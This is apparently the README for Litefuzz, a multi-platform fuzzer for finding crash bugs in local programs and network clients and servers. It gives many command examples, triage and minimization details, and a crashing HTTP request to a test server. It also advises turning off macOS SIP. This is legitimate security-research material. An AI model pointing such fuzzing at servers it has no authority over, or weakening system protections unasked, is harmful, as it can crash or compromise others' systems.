Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers
Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, supporting CLI/GUI apps, network clients and servers, in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while making just a few honest trade-offs.
It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumentation capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For network fuzzing, the Mutiny fuzzer also works well if you have PCAPs to replay, and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.
Run ./litefuzz.py and give your target... a lite fuzz.
$ sudo apt install latex2rtf
$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)
@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)
[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details
This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you'll see once you dive in.
why
Yes, another fuzzer, and one that doesn't track all that well with the current trends and conventions. Trade-offs were made to address certain requirements: a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem here, as this fuzzer does not require instrumentation, sacrificing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with libFuzzer). It doesn't do parallel fuzzing, nor does it support anything like the blazing speed improvements that persistent mode can provide, so it cannot scale anywhere close to fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly setting up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways, and many of the features such as mutators and minimization were written from scratch.
It was designed to "just work" and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose: to provide value in a lot of different target scenarios and environments and, most importantly and what all fuzzers should ultimately be judged on, the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is, however, more helpful to think of it as an R&D project rather than a fully-fledged product. Also, there's no complicated setup where it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to set up a ready-to-fuzz environment.
Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.
how it works
Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes, and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV, along with the file hashes. All unique crashes are triaged as it fuzzes, and this data along with target output (as available) is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay and providing the crashing file. In local client mode, the input directory should contain a server greeting, response or other data that a client would expect when connecting to a server. As of now, only one "shot" is implemented for network fuzzing, with no complex session support. The client is launched via the command line and debugged the same as when file fuzzing. A listener is set up to support this scenario; yes, it's slow and borderline manual labor, but it works. If a crash is detected, it is replayed in GDB to get the triage details. In remote client mode, this works the same except there is no local debugging / crash triage. In local server mode, it's similar to local client mode, and in remote server mode it just connects to a specified target and sends mutated sample client data that the user specifies as inputs, but only a simple "can we still connect? if not, it probably crashed on the last one" triage is provided.
There are a few mutation functions written from scratch which mostly do random mutations on a random selection of the inputs specified by the -i flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ, along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a. And if you want to fuzz servers, use server mode and provide a protocol://address:port just like for clients.
It fuzzes as fast as the target can consume the data and exit, as is the case for most CLI applications, or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course, if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. At that point, though, if you can get that close to the target, you're probably better off using persistent mode or similar features that other fuzzers offer.
In short...
what it does
- runs on linux, windows and mac and supports py2/py3
- fuzzes CLI/GUI binaries that read from files/stdin
- fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
- diffs, minimization, replay, sorting and auto-triaging of crashes
- misc stuff like TLS support, golang binary fuzzing and some extras for Mac
- mutates input with various built-in mutators + pyradamsa (Linux)
what it doesn't do
- native instrumentation
- scale with concurrent jobs
- complex session fuzzing
- remote client and server monitoring (only basic checks eg. connect)
support
Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported, and an effort was made to make the code compatible with Python2 as well, as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occurred on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions: on Linux, the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and dependency installation. It can generally fuzz native binaries on each platform, which are often compiled from C/C++, but it can also catch crashes in Golang binaries (experimental).
python versions
Python3 is supported for Linux and Mac while Python2 is required for Windows.
Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.
Why Py2 for Windows? Winappdbg requires Py2.
linux
GDB is used for debugging and the exploitable plugin for crash triage. If the target is OSS, you can build and instrument it with sanitizers and such; otherwise there are some memory debuggers we can just load at runtime.
This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.
mac
Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.
The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.
Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.
windows
WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.
Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.
targets
This is a list of the types of targets that have been tested and are generally supported.
- Local CLI/GUI apps that parse file formats or stdin
  - debug support
- Local CLI/GUI network client that parses server responses
  - debug support for CLIs
  - limited debug support for GUIs
- Local CLI network server that parses client requests
  - debug support (caveat: must be able to run as a standalone executable, otherwise can be treated as remote)
- Local GUI network server that parses client requests
  - theoretically supported, untested
- Remote CLI/GUI network client that parses server responses
  - no debug support
- Remote CLI/GUI network server that parses client requests
  - no debug support
  - exception being on Mac when using the attach or reportcrash features
Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.
triage
- Local CLI/GUI apps that parse file formats or stdin
  - run app, catch signals, repro by running it again inside a debugger with the crasher
- Local CLI/GUI network client that parses server responses
  - run app, catch signals, repro by running it again inside a debugger with the crasher
- Local GUI/CLI network server that parses client requests
  - run app in a debugger, catch signals, repro by running it again inside a debugger with the crasher
- Remote CLI/GUI network client that parses server responses
  - no visibility, collect crashes from the remote side
  - can manually write supporting scripts to aid in triage
- Remote CLI/GUI network server that parses client requests
  - no visibility, collect crashes from the remote side
  - can manually write supporting scripts to aid in triage
  - exception on Mac are the attach and reportcrash options, which can be used to enable some triage capabilities
getting started
Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.
See INSTALL.md for details.
tests
unit tests
There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.
py2> pytest
py3> python3 -m pytest
This will run pytest for test_litefuzz.py in the main directory and provide PASS/FAIL results once the test run is finished.
crashing app tests
A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test folder.
- (a) null pointer dereference
- (b) divide-by-zero
- (c) heap overflow
- (d-gui) format string bug in a GUI
- (e) buffer overflow in client
- (f) buffer overflow in server
They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on the Windows command line, check Event Viewer -> Windows Logs -> Application to see crashes.
options
There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.
crash directory
-o lets you specify a crash directory other than the default, which is crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs of different apps at the same time.
insulate mode
-u insulates the target application from the normal fuzzing process, eg. execing or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman, where you can script inside the application to repeat connections for client fuzzing. The target is run inside a debugger, the fuzzer pauses to give the user time to click a few buttons or set the target's config to make it run automatically, the user resumes, and now you are fuzzing interactive network clients.
litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z
Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, local CLI/GUI servers being fuzzed are only started and run once inside a debugger to make the process a little more efficient.
--key also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.
litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc
note: insulate mode has only been tested working on Linux and is not supported on Windows.
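Under the hood this presumably leans on Pyautogui, which is listed among the dependencies earlier; here's a hedged sketch of the keypress idea (the key name is an assumption, and the real --key handling may differ):

```python
import pyautogui

def send_key(key="f5"):
    # tap the key once in the currently focused window, eg. to make an
    # interactive client such as FileZilla reconnect between iterations
    pyautogui.press(key)

send_key()
```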
timeout
-x secs allows you to specify a timeout. In practice, this is more like "approximately how long between iterations" for CLI targets and an actual timeout for GUIs.
mutators
--mutator N specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is made for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa, of course). And while they have been extensively tested and have held up pretty well over millions of iterations, they may have subtle bugs from time to time, though generally this should not affect functionality.
FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7
note: Radamsa mutator is only available on Linux (+ Py3).
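To give a feel for what these do, here's a hedged sketch of what a flip-style mutator might look like; the actual FLIP_MUTATOR implementation may differ.

```python
import random

def flip_mutate(data, max_flips=8):
    # flip between 1 and max_flips random bits somewhere in the buffer
    buf = bytearray(data)
    if not buf:
        return bytes(buf)
    for _ in range(random.randint(1, max_flips)):
        pos = random.randrange(len(buf))
        buf[pos] ^= 1 << random.randrange(8)
    return bytes(buf)

print(flip_mutate(b"give your target a lite fuzz").hex())
```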
ReportCrash
--reportcrash is Mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.
note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.
sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
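Conceptually, the monitoring amounts to polling the crash log directory and flagging new logs that mention the target process, roughly like the sketch below (the DiagnosticReports path and .crash extension are assumptions for the macOS versions discussed; this is not Litefuzz's code).

```python
import glob
import os
import time

CRASH_DIR = os.path.expanduser("~/Library/Logs/DiagnosticReports")

def watch(target, interval=1.0):
    seen = set(glob.glob(os.path.join(CRASH_DIR, "*.crash")))
    while True:
        current = set(glob.glob(os.path.join(CRASH_DIR, "*.crash")))
        for log in current - seen:
            # only report logs that belong to the target process
            if target in os.path.basename(log):
                print("new crash log:", log)
        seen = current
        time.sleep(interval)

watch("latex2rtf")
```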
pause
Hit ctrl+c to pause the fuzzing process, then choose y to resume or n to stop. This feature works OK across platforms, but may be less reliable when fuzzing GUI apps.
reusing crashes for variant finding
-e enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing, which can help shake out even more bugs. Combine with -z for -ez bugs! Da-duph.
The following example fuzzes antiword with 100000 iterations and then starts another run with the same iteration count and options, reusing the crashes as input to try and grind out even more bugs.
litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez
(or one could manually copy crashes over to an input directory to directly control the iterations for the reuse run)
litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z
note: this mode is supported for local apps only.
memory debugging helpers
-z enables Electric Fence (or glibc malloc debugging as a fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. -zz can be used to disable PageHeap after enabling it for an application. If you want to just flip it on/off without starting the fuzzer, leave out the -i flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.
sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z
sudo litefuzz -l -c "notepad FUZZ" -zz
On Linux, specific helpers can be chosen. For example, instead of just using glib malloc as a fallback, it can be selected.
litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc
The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.
checking live target output
If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out to check the latest stdout from the target. RUN_ID is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out file. Global stdout/stderr also goes to /tmp/litefuzz/out for debugging purposes for all fuzzing targets, with the exception of insulated or local server modes, whose debugger output goes to /tmp/litefuzz/RUN_ID/out. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.
client and server modes
If the server can be run locally simply by executing the binary (with or without some flags and configuration), you can pass its command line with -c and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability to avoid those annoying bugs which trigger only after the target's memory is in a "certain state", which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (allowing the user to provide a client cert when fuzzing a server that requires it, and certificate fuzzing itself, are other ideas here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on the remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can be parsed by supporting scripts written for a particular target.
local network examples
litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z
litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z
litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z
(open Wireshark and capture the response, then right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)
litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3
litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z
litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z
quick notes
- UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
- Local network client fuzzing on Windows can be buggy and should be considered experimental at this time
remote network examples
Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in interaction between the two parties over the network to catch crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding and needs to be restarted manually after the client or server is restored to a normal (uncrashed) state unless the user has setup scripts on the remote side to manage this process. Again, UDP complicates this further. Even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off on visibility.
client
while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done
litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100
Client mode is more finicky here because it's hard to tell whether a client has actually crashed and so isn't reconnecting, or if the send/recv dance is just off, as different clients can handle connections however they like. Also note that this is just an example and that remote client fuzzing by nature is tricky and should be considered somewhat experimental.
server
The pros and cons of fuzzing a server locally or remotely can help you decide how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower, but you'll get crash logs with the automatic triage. Fuzzing the server in remote mode (even pointed at localhost) will be much faster on average, but you lose the high-visibility, debugger-based triage capabilities; it will, however, give you time to manually restart the server after each crash so fuzzing can keep going (TCP servers only, this feature does not support UDP-based servers).
Shoutcast
./sc_serv ...
litefuzz -s -a localhost:8000 -i input/shouts -n 10000
SSHesame
sshesame
litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05
FTP
litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000
DNS
coredns -dns.port 10000
litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000
or
litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000
TLS
litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000
...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)
[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...
note: the default remote server mode delays between fuzzing iterations make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x to set very fast timeouts between sessions (as shown above) if the target is OK parsing packets very quickly, unofficially nicknamed "2fast2furious" mode
For more on session-based protocols (such as FTP or SSH), see the multiple data exchange modes section below.
multiple data exchange modes
-p is for multiple binary data mode, which allows one to supply sequential inputs, eg. an input/ssh directory containing files named "1", "2", "3", etc. for each packet in the session to fuzz. This is meant to enable fuzzing of binary protocol implementations, such as an SSH client.
ls input/ssh
1 2 3 4
xxd input/ssh/2 | head
00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9 ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 e25519-sha256@li
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-
Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.
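A sketch of that idea, shown here in the server-fuzzing direction (simplified from the description above; the file naming and one-byte mutation are assumptions):

```python
import os
import random
import socket

def load_session(directory):
    # packet files are named 1, 2, 3, ... in send order
    names = sorted(os.listdir(directory), key=int)
    return [open(os.path.join(directory, n), "rb").read() for n in names]

def replay_mutated(packets, host, port):
    packets = list(packets)
    idx = random.randrange(len(packets))  # mutate one random packet
    buf = bytearray(packets[idx])
    if buf:
        buf[random.randrange(len(buf))] ^= 0xFF
    packets[idx] = bytes(buf)
    with socket.create_connection((host, port), timeout=5) as s:
        for pkt in packets:
            s.sendall(pkt)
            s.recv(4096)  # naively read the peer's next packet
```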
litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc
And you can check on the target's output for the latest iteration.
cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large
... and others like
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type
ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.
Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect
-pp asks the fuzzer to check inputs for line breaks and, if detected, treat them as multiple requests / responses. This is useful for simple network protocol fuzzing of mostly string-based protocol implementations, eg. FTP clients.
cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye
The fuzzer breaks each line into its own FTP response to try and fuzz a client's handling of a session. There's no guarantee, however, that a client will "behave"; it may act in ways that don't allow a session to complete properly, so some trial and error plus fine-tuning of session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.
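The splitting itself is straightforward; in miniature (a sketch, assuming the input file shown above):

```python
session = open("input/ftp/test", "rb").read()
responses = [line for line in session.splitlines() if line]
for i, resp in enumerate(responses, 1):
    # each line becomes its own response in the fuzzed session
    print("response %d: %s" % (i, resp.decode(errors="replace")))
```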
litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z
This can also be combined with -u for insulating GUI network targets like FileZilla.
litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc
attaching to a process
If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.
./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000
note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.
crash artifacts
When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally a text file is produced with a backtrace, register information, !exploitable-type output (where available) and other basic information.
Memory dumps can be enabled on Windows by passing --memdump or disabled with --nomemdump, similar to how malloc debuggers are controlled via -z and -zz respectively. If enabled, the dump will also be loaded in the console debugger (cdb) and the !analyze -v crash analysis output is captured in an additional memory dump crash analysis log. Winappdbg already provides !exploitable-type analysis in the initial crash triage, so we just do !analyze here.
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump
or to disable memory dumps for an application
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump
In addition to the auto-crash triage, binary/string diffs (as appropriate) and target stdout (platform / target dependent) are also produced, along with repro files of course.
For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.
$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt
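The names appear to encode a fault classification, signal, faulting PC and a hash, so all artifacts for one crash share a common stem; here's a sketch of that bucketing idea (the field layout and hash choice are assumptions, not the actual code):

```python
import hashlib

def artifact_stem(classification, sig, pc, repro):
    # all artifacts (.diff, .out, .txt, repro) for one crash share this stem
    digest = hashlib.sha256(repro).hexdigest()
    return "{}_{}_{:x}_{}".format(classification, sig, pc, digest)

print(artifact_stem("PROBABLY_EXPLOITABLE", "SIGSEGV", 0x5556, b"\x00" * 32) + ".tex")
```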
On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.
C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....
For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, a repro file and/or repro file directory (if the input is a session with multiple packets), the previous fuzzing iteration's repro (to avoid losing a bug in case it's actually the crasher, as remote fuzzing has its challenges) and a crash log or brief information file.
ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz
ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz
golang
Apparently, when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead exit with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and the edge cases around it, but one can use --golang to try and catch crashes in Golang binaries on Linux.
litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000
repros
Crashing files are kept in the crashes/ directory (or the directory specified by the -o flag) along with diffs and crash info. -r and passing a repro file (or directory) with the appropriate target command line / address setup will try to reproduce the crash locally or remotely.
local example
litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z
local network example
./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw
remote network example
litefuzz -s -a tcp://host:8000 -r crashes/crash.raw
remote network example (multiple packets)
litefuzz -s -a tcp://localhost:22 -r repro/dir/here
remove file
Some targets ask for a static output file location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing: after each fuzzing iteration, it removes the file that was generated as part of how the target functions.
litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez
minimization
Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.
-m and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but is smaller and without bytes that may not be necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.
For example, this request is the original repro file.
GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug
Now take a look at its minimized version.
GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi
One can make some guesses about what the target is looking for and even the root cause of the crash.
- The request line is the most important part
- option= can probably be a lot of different things
- The Host and Connection headers aren't necessary
- Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
- Referer is necessary, but only admin.cgi and not the host or URL
Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and vice versa. Since the minimization is linear, starting at the beginning of the file and going until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!
-mm enables supermin mode. This is slower, but it will try to minimize over and over again until there are no more unnecessary bytes to remove.
For fun, we can modify the repro and run it through supermin to get the maximally minimized version.
GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi
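Put together, the linear pass and the supermin loop look roughly like this sketch, where crashes() stands in for "run the target on this candidate and check if it still crashes" (an illustration, not the actual implementation):

```python
def minimize(data, crashes):
    # walk from the start, dropping one byte at a time and keeping the
    # removal whenever the target still crashes without that byte
    i = 0
    while i < len(data):
        candidate = data[:i] + data[i + 1:]
        if crashes(candidate):
            data = candidate  # byte was unnecessary
        else:
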